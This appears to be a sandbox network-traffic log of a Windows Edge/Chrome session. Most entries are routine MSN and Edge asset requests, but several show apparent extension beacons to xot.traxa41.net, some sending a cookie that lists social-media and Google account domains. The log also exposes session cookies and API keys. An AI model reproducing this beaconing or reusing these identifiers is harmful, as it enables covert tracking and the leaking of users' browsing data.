Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/RewardsData.d04fc8c7d4c8170f30ae.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/RewardsCoachmarkData.c462c3980af18bc60b9d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.e6fcf9edbaadfb663ccb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ext/analytic?do=init&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ext/installed?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/News/Users/me/Rewards?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=rewards-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON&version=2 HTTP/1.1Host: assets.msn.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12Q7vH.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/grid-view-feed.f421ed2fe498976a2181.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /124bcd1a-f3d7-4fb7-9a67-95cb55e1369b/e98de748-51c9-427f-bc64-8a50262c8fdb.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.9abeb397be7183994289.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-components_follow-publisher-button_dist_index_js.bdee2604ba001760eaa1.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ext/analytic?do=init&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ext/installed?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_super-feed_dist_feed-manager_FeedManagerWithClientAd_js-node_modules_fluentui_svg-icons_-8f340f.92749e5d36b29b902c76.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/graph/actions?%24top=20&%24filter=actionType+eq+%27Follow%27+and+%28targetType+eq+%27Location%27%29&apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic	HTTP traffic detected: GET /service/msn/user?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nas-highlight-v1.ad1f555a047bcac24a4a.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /service/segments/recoitems/weather?apikey=UhJ4G66OjyLbn9mXARgajXLiLw6V75sHnfpU60aJBB&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=weather-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON&units=F&appId=4de6fc9f-3262-47bf-9c99-e189a8234fa2&wrapodata=false&includemapsmetadata=true&cuthour=true&filterRule=card&distanceinkm=0&regionDataCount=20&orderby=distance&days=5&pageOcid=anaheim-dhp-peregrine&source=undefined_csr&hours=13&fdhead=prg-1sw-wxmptreplace&contentcount=3&region=us&market=en-us&locale=en-us&lat=33.75510787963867&lon=-84.39060974121094 HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/taskbar_v10/WindyV2.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nas-highlight-v3v4.5873ec4aa566b5d8efc3.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ext/antlog?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: gxid=6628213c59b94; installed=true; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; safe-installed-internal=true
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nativeadstemplates.3d1fd5b812e57319e143.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/node_modules_xmlbuilder2_lib_xmlbuilder2_min_js.365db5621a87ab118310.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ext/antlog?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: gxid=6628213c59b94; installed=true; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/pill-wc.87e5c35451d51ad2c9c1.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
